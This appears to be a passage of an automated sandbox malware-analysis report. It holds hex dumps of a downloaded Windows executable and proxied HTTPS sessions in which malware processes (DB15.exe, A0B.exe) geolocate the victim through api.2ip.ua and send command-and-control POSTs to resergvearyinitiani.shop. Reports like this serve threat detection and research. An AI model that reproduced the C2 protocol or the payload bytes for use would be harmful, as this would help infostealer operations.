2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>|@.rsrc/>0~@@
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.835324049 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 00 00 00 00 f6 6b 03 00 0c 6c 03 00 22 6c 03 00 2e 6c 03 00 48 6c 03 00 5a 6c 03 00 70 6c 03 00 86 6c 03 00 96 6c 03 00 ac 6c 03 00 c0 6c 03 00 d0 6c
                                                                                                                                                                                                                                      Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnnnoo,o@oTo`opoookoo
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.835338116 CET1286INData Raw: 75 00 77 00 00 00 53 00 6f 00 6c 00 6f 00 66 00 75 00 64 00 69 00 20 00 67 00 6f 00 78 00 6f 00 72 00 75 00 76 00 20 00 73 00 61 00 70 00 6f 00 63 00 75 00 7a 00 69 00 00 00 4e 00 69 00 6d 00 69 00 67 00 6f 00 74 00 20 00 67 00 69 00 66 00 6f 00
                                                                                                                                                                                                                                      Data Ascii: uwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefej
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.840276003 CET1286INData Raw: 63 00 68 00 61 00 72 00 3e 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 20 00 3e 00 20 00 3e 00 3a 00 3a 00 6f 00
                                                                                                                                                                                                                                      Data Ascii: char>,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.840317011 CET1286INData Raw: 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 62 00 61 00 73 00 69 00 63 00 5f 00 73 00 74 00 72 00 69 00 6e 00 67 00 3c 00 63 00 68 00 61 00 72 00 2c 00
                                                                                                                                                                                                                                      Data Ascii: ::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_ite
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.840329885 CET1286INData Raw: 3e 00 3d 00 20 00 63 00 6f 00 75 00 6e 00 74 00 00 00 00 00 73 00 72 00 63 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00
                                                                                                                                                                                                                                      Data Ascii: >= countsrc != NULLmemcpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.cdst != NULLmemmove_sf:\dd\vctools\crt_
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.845155954 CET1286INData Raw: 68 00 65 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: he Visual C++ documentation on asserts.memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)),
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.845213890 CET1286INData Raw: 00 00 00 00 28 00 73 00 74 00 72 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 00 00 70 00 75 00 74 00 63 00 00 00 00 00 76 00 73 00 63 00 61 00 6e 00 66 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00
                                                                                                                                                                                                                                      Data Ascii: (str != NULL)putcvscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.845227003 CET1286INData Raw: 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69 67 6e 65 64 5f 72 65 61 6c 6c 6f 63 28 29 00 00 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74
                                                                                                                                                                                                                                      Data Ascii: routines, use _aligned_realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-alloca
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:36.865156889 CET1286INData Raw: 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 66 72 65 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79
                                                                                                                                                                                                                                      Data Ascii: ed at %hs(%d).Client hook free failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allo
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:37.094963074 CET1286INData Raw: 65 00 6d 00 43 00 68 00 65 00 63 00 6b 00 70 00 6f 00 69 00 6e 00 74 00 00 00 73 00 74 00 61 00 74 00 65 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 4f 62 6a 65 63 74 20 64 75 6d 70 20 63 6f 6d 70 6c 65 74 65 2e 0a 00 00 63 72 74 20
                                                                                                                                                                                                                                      Data Ascii: emCheckpointstate != NULLObject dump complete.crt block at 0x%p, subtype %x, %Iu bytes long.normal block at 0x%p, %Iu bytes long.client block at 0x%p, subtype %x, %Iu bytes long.{%ld} %hs(%d) : #File


                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.649711104.21.65.244437004C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:04 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                                                                                      2024-03-28 16:51:05 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:05 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7m5chb07BYbIU13FCpEi4CHzPJsMfnixznzB71shzTyzXAIUhqH115n5z1WlDSZ4HOSZRz6ijD0uvZHBsxa6VcAO%2F1hcbZb4Ba0lhZ8m2pn4FiVCOZve%2BCBPjV%2Ff"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91f73bce27007-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:05 UTC480INData Raw: 32 30 39 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                                                                                      Data Ascii: 209{"ip":"102.165.48.43","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                                                                                      2024-03-28 16:51:05 UTC48INData Raw: 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 35 33 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 39 34 37 36 22 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: latitude":"38.89539","longitude":"-77.039476"}
                                                                                                                                                                                                                                      2024-03-28 16:51:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.649712104.21.65.244434436C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:06 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:07 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEhQFCYagUBYDUfAr3z%2FnK%2F4%2BpvSzi0qglBY53AESyi6LRHDmlL8KeVpC08STaiLec5XyfxmV4DBaKJhYphnopAv9Un34JYiTsWmk7OZITu8DCxDp9c139lBdW48"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91f813dfe2036-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC480INData Raw: 32 30 39 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                                                                                      Data Ascii: 209{"ip":"102.165.48.43","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC48INData Raw: 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 35 33 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 39 34 37 36 22 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: latitude":"38.89539","longitude":"-77.039476"}
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.649713104.21.65.244436320C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC895INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:07 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdLGe%2B2C%2FNh9fGg229n%2FPZy%2FW9ZeSC2CY4xXBCt%2BWmUxou0Xj4k0OI9dvOiZ7zzvlhVmMbZYnychrLOkw%2BzB5GonaoDWVSgfNvbcoYnqjq4IO1CW8DEZ14ef9fRn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91f82081a3b29-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC474INData Raw: 32 30 39 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                                                                                      Data Ascii: 209{"ip":"102.165.48.43","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC54INData Raw: 34 33 64 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 35 33 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 39 34 37 36 22 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 43d","latitude":"38.89539","longitude":"-77.039476"}
                                                                                                                                                                                                                                      2024-03-28 16:51:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.649719104.21.65.244436848C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:19 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                                                                                      2024-03-28 16:51:19 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:19 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L5zDY6svziNAwzJDlOziJr5xSpUNeH3Twixy63pg5UsD1H9WkzM8ybIMsi7Rpt5fLV0jMLatf8uA1oik6CjOkpJNvDmxZEu9X%2B3c7osco%2FEwNIvRPf4lHYFGtpSr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91fcfdf4c2d22-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:19 UTC482INData Raw: 32 30 39 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                                                                                      Data Ascii: 209{"ip":"102.165.48.43","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                                                                                      2024-03-28 16:51:19 UTC46INData Raw: 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 35 33 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 39 34 37 36 22 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: titude":"38.89539","longitude":"-77.039476"}
                                                                                                                                                                                                                                      2024-03-28 16:51:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.649721104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=m09sb142ba80i268ot93h7igt3; expires=Mon, 22-Jul-2024 10:38:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv%2BZFENYgX%2BSiv6cJiwNksw%2BU5OpwNoZy7NaMEL%2FGBb3LYG5iECdUrcXeChBsKID0sTdsrwig3iigGvDi1FUSK%2BsOGMwbeNLob8LSDBumXae8lGIDZn1z2zEXN1IbqiA5J4YBiWWixrqUaw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91fe0488d28ae-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.649722104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:22 UTC61OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
                                                                                                                                                                                                                                      2024-03-28 16:51:23 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=828akpbpdpvlsi8ilgdsikg1mt; expires=Mon, 22-Jul-2024 10:38:02 GMT; Max-Age=9999999; path=/
